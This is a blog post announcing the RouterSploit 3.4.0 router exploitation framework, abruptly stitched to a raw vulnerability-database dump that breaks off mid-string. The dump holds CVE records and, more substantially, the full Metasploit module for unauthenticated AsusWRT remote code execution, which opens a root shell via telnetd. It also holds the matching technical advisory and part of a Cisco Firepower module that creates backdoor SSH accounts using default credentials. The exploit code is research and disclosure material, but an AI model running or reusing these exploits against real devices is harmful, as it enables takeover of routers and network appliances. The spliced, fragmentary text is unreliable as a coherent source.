**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update, is out guys! This release includes some really cool features and updates, such as the switch from `pycrypto` to `pycryptodome` and newer exploitation modules. Read on for the improvements.

## What is RouterSploit?
> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aid penetration testing operations:
>
> * exploits – modules that take advantage of identified vulnerabilities
> * creds – modules designed to test credentials against network services
> * scanners – modules that check if a target is vulnerable to any exploit
> * payloads – modules that are responsible for generating payloads for various architectures and injection points
> * generic – modules that perform generic attacks
## Official RouterSploit 3.4.0 changelog:
* Fixing `setup.py` resources
* Switching to pycryptodome
* Fixing communication API
* Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)
* Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module
* Adding credentials used by Mirai botnet
* Fixing 3Com OfficeConnect RCE module
* Fixing `exploits/routers/billion/billion_5200w_rce.py` module
* Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)
* Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)
* Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module
* Fixing `exploits/routers/multi/tcp_32764_rce.py` module
* Fixing `exploits/routers/ubiquiti/airos_6_x.py` module
* Adding `OptEncoder` option
* Fixing `use` command issue
* Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`
* Adding tests for modules default values
* Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`
* Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`
* Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`
* Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`
* Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`
* Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`
* Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`
* Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module
* Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module
* Adding `exploits/routers/linksys/eseries_themoon_rce.py` module
## Install RouterSploit 3.4.0:
If you have an older version checked out, all you need to do to get the latest version is run `git pull` in the installed directory. If you do not have it installed, the current version is RouterSploit 3.4.0: check out the [Git repository](<https://github.com/threat9/routersploit>), then run

```
pip3 install -r requirements.txt
./rsf.py
```
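As an added example (not code from the post or from the RouterSploit project), the update procedure above wrapped in a small POSIX shell script that decides between `git clone` and `git pull`, and confirms that the working tree really carries the 3.4.0 changes before installing requirements. The marker files are taken from the changelog above; the assumption that a 3.4.0 tree lists `pycryptodome` rather than `pycrypto` in `requirements.txt` is mine, derived from the "Switching to pycryptodome" entry.

```shell
#!/bin/sh
# Added example, not part of the original post or the RouterSploit project.
# Update or clone RouterSploit and verify the checkout is at 3.4.0 (or later)
# before installing its Python dependencies.

RSF_REPO="https://github.com/threat9/routersploit"

# Modules and tests that the 3.4.0 changelog lists as newly added; an older
# checkout will not contain them.
RSF_340_MARKERS="exploits/routers/asus/asuswrt_lan_rce.py
exploits/routers/linksys/eseries_themoon_rce.py
tests/exploits/routers/technicolor/test_tg784_authbypass.py"

# rsf_checkout_state DIR
# Prints one of: missing, stale, current. Returns 0 only for "current".
#   missing -> no checkout at DIR (clone it)
#   stale   -> checkout present but lacks a 3.4.0 file, or still pins pycrypto
#   current -> all 3.4.0 markers present and pycrypto is gone
rsf_checkout_state() {
    dir=$1
    if [ ! -f "$dir/rsf.py" ]; then
        echo missing
        return 1
    fi
    for f in $RSF_340_MARKERS; do
        if [ ! -f "$dir/$f" ]; then
            echo stale
            return 1
        fi
    done
    # Assumption: a 3.4.0 tree names pycryptodome, not the abandoned pycrypto,
    # in requirements.txt. Match "pycrypto" alone or with a version specifier,
    # but not "pycryptodome".
    if grep -Eqi '^pycrypto([=<>~ ]|$)' "$dir/requirements.txt" 2>/dev/null; then
        echo stale
        return 1
    fi
    echo current
    return 0
}

# rsf_update DIR: clone or pull as needed, then install requirements.
rsf_update() {
    dir=$1
    state=$(rsf_checkout_state "$dir" || true)
    case $state in
        missing) git clone "$RSF_REPO" "$dir" ;;
        stale)   git -C "$dir" pull ;;
        current) echo "checkout already at 3.4.0 or later" ;;
    esac
    pip3 install -r "$dir/requirements.txt"
}
```

Run `rsf_update ~/routersploit` (or any checkout path); `rsf_checkout_state` can be used on its own to audit an existing checkout without touching the network.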
The post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).
This is available to unauthenticated attackers in conjunction with CVE-2018-5999.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-6000", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-6000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6000", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-23T15:10:49", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. 
In the handle_request function in router/httpd/httpd.c, processing of POST requests continues even if authentication fails.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-5999", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5999", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-03T14:39:40", "description": "The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary commands via crafted web-application parameters, aka Bug ID CSCva30872.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T10:59:00", "type": "cve", "title": "CVE-2016-6433", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2021-01-05T17:39:00", "cpe": ["cpe:/a:cisco:firepower_management_center:5.4.1.3", "cpe:/a:cisco:firepower_management_center:5.4.1", "cpe:/a:cisco:firepower_management_center:6.0.1", "cpe:/a:cisco:firepower_management_center:5.3.1.4", "cpe:/a:cisco:firepower_management_center:5.4.1.2", "cpe:/a:cisco:firepower_management_center:5.4.1.1", "cpe:/a:cisco:firepower_management_center:5.3.1", "cpe:/a:cisco:firepower_management_center:5.3.0.3", "cpe:/a:cisco:firepower_management_center:5.3.1.5", "cpe:/a:cisco:firepower_management_center:5.2.0", "cpe:/a:cisco:firepower_management_center:5.3.0.4", "cpe:/a:cisco:firepower_management_center:5.3.1.6", "cpe:/a:cisco:firepower_management_center:5.4.0", "cpe:/a:cisco:firepower_management_center:5.3.0.2", "cpe:/a:cisco:firepower_management_center:5.3.1.3", "cpe:/a:cisco:firepower_management_center:5.4.1.5", "cpe:/a:cisco:firepower_management_center:5.4.0.2", "cpe:/a:cisco:firepower_management_center:5.3.0", "cpe:/a:cisco:firepower_management_center:5.4.1.6", "cpe:/a:cisco:firepower_management_center:5.4.1.4"], "id": "CVE-2016-6433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6433", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, 
"cpe23": ["cpe:2.3:a:cisco:firepower_management_center:5.3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T14:59:49", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. 
The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. 
Cisco Bug IDs: CSCvd48893.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T22:59:00", "type": "cve", "title": "CVE-2017-3881", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2020-08-07T20:08:00", "cpe": ["cpe:/o:cisco:ios_xe:3.9e", "cpe:/o:cisco:ios:15.1\\(3\\)svs"], "id": "CVE-2017-3881", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:ios_xe:3.9e:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios:15.1\\(3\\)svs:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-02-24T00:58:03", "description": "", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "packetstorm", "title": "AsusWRT LAN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "PACKETSTORM:146560", "href": "https://packetstormsecurity.com/files/146560/AsusWRT-LAN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: 
http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to \nperform a POST in certain cases. This can be combined with another vulnerability in \nthe VPN configuration upload routine that sets NVRAM configuration variables directly \nfrom the POST request to enable a special command mode. \nThis command mode can then be abused by sending a UDP packet to infosvr, which is running \non port UDP 9999 to directly execute commands as root. \nThis exploit leverages that to start telnetd in a random port, and then connects to it. \nIt has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. 
\n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], \n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], \n['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], \n['CVE', '2018-5999'], \n['CVE', '2018-6000'] \n], \n'Targets' => \n[ \n[ 'AsusWRT < v3.0.0.4.384.10007', \n{ \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find', \n}, \n}, \n} \n], \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, \n'DisclosureDate' => 'Jan 22 2018', \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(9999) \n]) \n \nregister_advanced_options( \n[ \nOptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) \n]) \nend \n \ndef exploit \n# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD \n# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! \npost_data = Rex::MIME::Message.new \npost_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\") \n \ndata = post_data.to_s \n \nres = send_request_cgi({ \n'uri' => \"/vpnupload.cgi\", \n'method' => 'POST', \n'rport' => datastore['ASUSWRTPORT'], \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \nif res and res.code == 200 \nprint_good(\"#{peer} - Successfully set the ateCommand_flag variable.\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\") \nend \n \n \n# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. 
\ninfo_pdu_size = 512 # expected packet size, not sure what the extra bytes are \nr = Random.new \n \nibox_comm_pkt_hdr_ex = \n[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC \n[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 \n[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 \nr.bytes(4) + # Info, don't know what this is \nr.bytes(6) + # MAC address \nr.bytes(32) # Password \n \ntelnet_port = rand((2**16)-1024)+1024 \ncmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*') \npkt_syscmd = \n[cmd.length,0x00].pack('C*') + # cmd length \ncmd # our command \n \npkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) \n \nconnect_udp \nudp_sock.put(pkt_final) # we could process the response, but we don't care \ndisconnect_udp \n \nprint_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\") \nsleep(10) \n \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) \nif not sock.nil? \nprint_good(\"#{peer} - Success, shell incoming!\") \nreturn handler(sock) \nend \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e \nsock.close if sock \nend \n \nprint_bad(\"#{peer} - Well that didn't work... 
try again?\") \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146560/asuswrt_lan_rce.rb.txt"}, {"lastseen": "2018-01-26T08:23:18", "description": "", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "packetstorm", "title": "AsusWRT Router Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-26T00:00:00", "id": "PACKETSTORM:146102", "href": "https://packetstormsecurity.com/files/146102/AsusWRT-Router-Remote-Code-Execution.html", "sourceData": "`>> Unauthenticated LAN remote code execution in AsusWRT \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 22/01/2018 / Last updated: 25/01/2018 \n \n \n>> Background and summary \nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. \nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. \n \nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. \n \nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). 
\n \n \n>> Technical details: \n#1 \nVulnerability: HTTP server authentication bypass \nCVE-2018-5999 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. \nIn AsusWRT_source/router/httpd/httpd.c: \n \nhandle_request(void) \n{ \n... \nhandler->auth(auth_userid, auth_passwd, auth_realm); \nauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); \n \nif (auth_result != 0) <--- auth fails \n{ \nif(strcasecmp(method, \"post\") == 0){ \nif (handler->input) { \nhandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed \n} \nsend_login_page(fromapp, auth_result, NULL, NULL, 0); \n} \n//if(!fromapp) http_logout(login_ip_tmp, cookies); \nreturn; \n} \n... \n} \n \nThis can (and will) be combined with other vulnerabilities to achieve remote code execution. \n \n \n#2 \nVulnerability: Unauthorised configuration change (NVRAM value setting) \nCVE-2018-6000 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. \nIn AsusWRT_source/router/httpd/web.c: \n \ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary) \n{ \n... 
\nif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) { \nif(strstr(post_buf, \"name=\\\"file\\\"\")) \nbreak; \nelse if(strstr(post_buf, \"name=\\\"\")) { \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \np = post_buf; \nname = strstr(p, \"\\\"\") + 1; \np = strstr(name, \"\\\"\"); \nstrcpy(p++, \"\\0\"); \nvalue = strstr(p, \"\\r\\n\\r\\n\") + 4; \np = strstr(value, \"\\r\"); \nstrcpy(p, \"\\0\"); \n//printf(\"%s=%s\\n\", name, value); \nnvram_set(name, value); \n} \n} \n... \n} \n \nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. \n \nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. \n \nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. \nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). \n \nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. \n \n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). 
\n \nPacket structure (from AsusWRT_source/router/shared/iboxcom.h): \n- Header \ntypedef struct iboxPKTEx \n{ \nBYTE ServiceID; \nBYTE PacketType; \nWORD OpCode; \nDWORD Info; // Or Transaction ID \nBYTE MacAddress[6]; \nBYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string \n} ibox_comm_pkt_hdr_ex; \n \n- Body \ntypedef struct iboxPKTCmd \n{ \nWORD len; \nBYTE cmd[420]; <--- command goes here \n} PKT_SYSCMD; // total 422 bytes \n \nA Metasploit module exploiting this vulnerability has been released [3]. \n \n \n>> Fix: \nUpgrade to AsusWRT v3.0.0.4.384.10007 or above. \nSee [4] for the very few details and new firmware released by Asus. \n \n \n>> References: \n[1] https://blogs.securiteam.com/index.php/archives/3589 \n[2] https://github.com/jduck/asus-cmd \n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb \n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business >> \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146102/asuswrt3-exec.txt"}, {"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140467", "href": "https://packetstormsecurity.com/files/140467/Cisco-Firepower-Management-Console-6.0-Post-Authentication-UserAdd.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < 
Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::SSH \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Cisco Firepower Management Console. \nThe management system contains a configuration flaw that allows the www user to \nexecute the useradd binary, which can be abused to create backdoor accounts. \nAuthentication is required to exploit this vulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt', # Original discovery & PoC \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2016-6433' ], \n[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] \n], \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 10 2016', \n'CmdStagerFlavor'=> %w{ echo }, \n'DefaultOptions' => \n{ \n'SSL' => 'true', \n'SSLVersion' => 'Auto', \n'RPORT' => 443 \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \n# admin:Admin123 is the default credential for 6.0.1 \nOptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), \nOptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), \nOptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), \nOptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), \nOptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), \nOptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22]) \n], self.class) \nend \n \ndef check \n# For this exploit to work, we need to check two services: \n# * HTTP 
- To create the backdoor account for SSH \n# * SSH - To execute our payload \n \nvprint_status('Checking Cisco Firepower Management console...') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') \n}) \n \nif res && res.code == 200 \nvprint_status(\"Console is found.\") \nvprint_status(\"Checking SSH service.\") \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nNet::SSH.start(rhost, 'admin', \nport: datastore['SSHPORT'], \npassword: Rex::Text.rand_text_alpha(5), \nauth_methods: ['password'], \nnon_interactive: true \n) \nend \nrescue Timeout::Error \nvprint_error('The SSH connection timed out.') \nreturn Exploit::CheckCode::Unknown \nrescue Net::SSH::AuthenticationFailed \n# Hey, it talked. So that means SSH is running. \nreturn Exploit::CheckCode::Appears \nrescue Net::SSH::Exception => e \nvprint_error(e.message) \nend \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_sf_action_id(sid) \nrequirements = {} \n \nprint_status('Attempting to obtain sf_action_id from 